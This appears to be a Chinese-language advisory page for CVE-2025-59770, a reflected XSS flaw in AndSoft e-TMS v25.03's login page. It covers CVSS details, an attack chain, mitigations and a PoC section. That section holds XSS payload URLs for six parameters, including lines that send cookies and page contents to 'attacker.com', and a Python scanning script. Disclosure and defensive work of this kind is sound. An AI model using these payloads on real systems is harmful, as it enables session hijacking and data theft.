CVE-2025-59770：AndSoft e-TMS反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59770

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS v25.03

漏洞概述

CVE-2025-59770是存在于AndSoft e-TMS v25.03版本中的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）于2025年10月2日披露，CVSS 3.1评分为6.1分，属于中危级别漏洞。AndSoft e-TMS是一款运输管理系统（TMS），广泛应用于物流和运输行业，帮助企业管理运输流程、订单跟踪、车队管理等业务。该漏洞存在于系统的登录页面文件'/clt/LOGINFRM_MON.ASP'中，涉及多个参数未经过充分的输入验证和输出编码处理，导致攻击者可以通过构造恶意的URL链接，将JavaScript代码注入到受害者的浏览器上下文中执行。由于该漏洞需要用户交互（点击恶意链接），攻击者通常会结合社会工程学手段，通过钓鱼邮件、即时消息等方式诱导受害者访问恶意构造的URL。一旦漏洞被利用，攻击者可以在受害者浏览器中执行任意JavaScript代码，可能导致会话劫持、敏感信息窃取、钓鱼攻击进一步升级等安全风险。该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明漏洞可通过网络远程利用，攻击复杂度低，无需认证即可发起攻击，但需要受害者进行交互（点击链接），并且漏洞影响范围会发生变化（Scope Changed），对机密性和完整性造成低影响。

技术细节

该漏洞是一个典型的反射型XSS漏洞，根本原因在于AndSoft e-TMS v25.03的登录页面'/clt/LOGINFRM_MON.ASP'对用户输入参数未进行充分的过滤和HTML实体编码处理。具体而言，漏洞涉及以下六个参数：l、demo、demo2、TNTLOGIN、UO和SuppConn。这些参数接收的用户输入被直接嵌入到HTML响应页面中，而没有进行适当的输出编码（如HTML实体编码），导致攻击者可以在这些参数中注入恶意的JavaScript代码。当受害者访问攻击者精心构造的恶意URL时，服务器会将恶意脚本作为响应内容的一部分返回，并在受害者的浏览器中执行。

利用方式方面，攻击者首先需要构造一个包含恶意JavaScript代码的URL。例如，攻击者可以将JavaScript代码作为参数值附加到上述任一参数中，如：https://target/clt/LOGINFRM_MON.ASP?l=<script>alert(document.cookie)</script>。然后，攻击者通过钓鱼邮件、社交媒体或其他方式诱导受害者点击该链接。当受害者在已登录目标系统的浏览器中点击链接时，恶意脚本将在其浏览器上下文中执行，攻击者可以窃取会话Cookie、重定向用户到恶意网站、修改页面内容或执行其他恶意操作。由于漏洞影响范围发生变化（Scope Changed），意味着攻击者可以在受害者的权限上下文中执行操作，可能访问到原本无法直接访问的资源。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统运行AndSoft e-TMS v25.03版本，通过网络侦察确定登录页面'/clt/LOGINFRM_MON.ASP'的URL地址。

STEP 2

步骤2：构造恶意URL

攻击者分析发现l、demo、demo2、TNTLOGIN、UO和SuppConn参数存在反射型XSS漏洞，在这些参数中注入恶意的JavaScript代码（如窃取Cookie、重定向等），构造完整的恶意URL。

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、社交媒体消息、即时通讯工具等方式，将恶意URL发送给目标用户，利用社会工程学手段诱导受害者点击。

STEP 4

步骤4：触发漏洞

受害者在已登录AndSoft e-TMS系统的浏览器中点击恶意链接，浏览器向服务器发送包含恶意参数的请求。

STEP 5

步骤5：恶意脚本执行

服务器将未经过滤的用户输入直接嵌入到HTML响应中返回，恶意JavaScript代码在受害者浏览器中执行，可能窃取会话Cookie、重定向到钓鱼页面或执行其他恶意操作。

STEP 6

步骤6：权限利用与持久化

攻击者利用窃取的会话信息冒充受害者身份登录系统，可能获取敏感业务数据、修改运输订单信息或进行其他未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
CVE-2025-59770 - Reflected XSS PoC for AndSoft e-TMS v25.03
Vulnerable endpoint: /clt/LOGINFRM_MON.ASP
Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn
-->

<!-- Basic XSS payload exploiting the 'l' parameter -->
https://target-server/clt/LOGINFRM_MON.ASP?l=<script>alert('XSS-CVE-2025-59770')</script>

<!-- XSS payload exploiting 'demo' parameter to steal cookies -->
https://target-server/clt/LOGINFRM_MON.ASP?demo=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

<!-- XSS payload exploiting 'demo2' parameter -->
https://target-server/clt/LOGINFRM_MON.ASP?demo2=<img src=x onerror=alert(document.domain)>

<!-- XSS payload exploiting 'TNTLOGIN' parameter -->
https://target-server/clt/LOGINFRM_MON.ASP?TNTLOGIN="><svg/onload=alert('XSS')>

<!-- XSS payload exploiting 'UO' parameter -->
https://target-server/clt/LOGINFRM_MON.ASP?UO=<script>fetch('http://attacker.com/log?data='+document.body.innerHTML)</script>

<!-- XSS payload exploiting 'SuppConn' parameter -->
https://target-server/clt/LOGINFRM_MON.ASP?SuppConn=<iframe src=javascript:alert('XSS')></iframe>

<!-- Full Python exploit script for automated testing -->
import requests

TARGET_URL = "https://target-server/clt/LOGINFRM_MON.ASP"
VULNERABLE_PARAMS = ["l", "demo", "demo2", "TNTLOGIN", "UO", "SuppConn"]
PAYLOAD = "<script>alert('XSS-CVE-2025-59770')</script>"

def test_xss(url, params):
    """Test for reflected XSS vulnerability"""
    for param in params:
        test_params = {param: PAYLOAD}
        try:
            response = requests.get(url, params=test_params, verify=False, timeout=10)
            if PAYLOAD in response.text:
                print(f"[+] XSS confirmed in parameter: {param}")
                print(f"[+] Full URL: {response.url}")
                return True
        except Exception as e:
            print(f"[-] Error testing {param}: {e}")
    return False

if __name__ == "__main__":
    test_xss(TARGET_URL, VULNERABLE_PARAMS)

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）对访问'/clt/LOGINFRM_MON.ASP'的URL请求进行监控，识别和阻止包含可疑JavaScript代码或HTML标签的请求；2）在Web服务器或反向代理层面部署输入过滤规则，对URL参数中的特殊字符（如<、>、"、'、script等）进行过滤或编码；3）为系统配置Content-Security-Policy响应头，限制内联脚本执行；4）确保所有用户会话Cookie设置了HTTPOnly属性，降低Cookie被窃取的风险；5）对用户进行安全意识培训，警惕不明来源的链接，避免点击可疑URL；6）考虑在网络层面部署WAF，启用XSS防护规则集进行临时防护。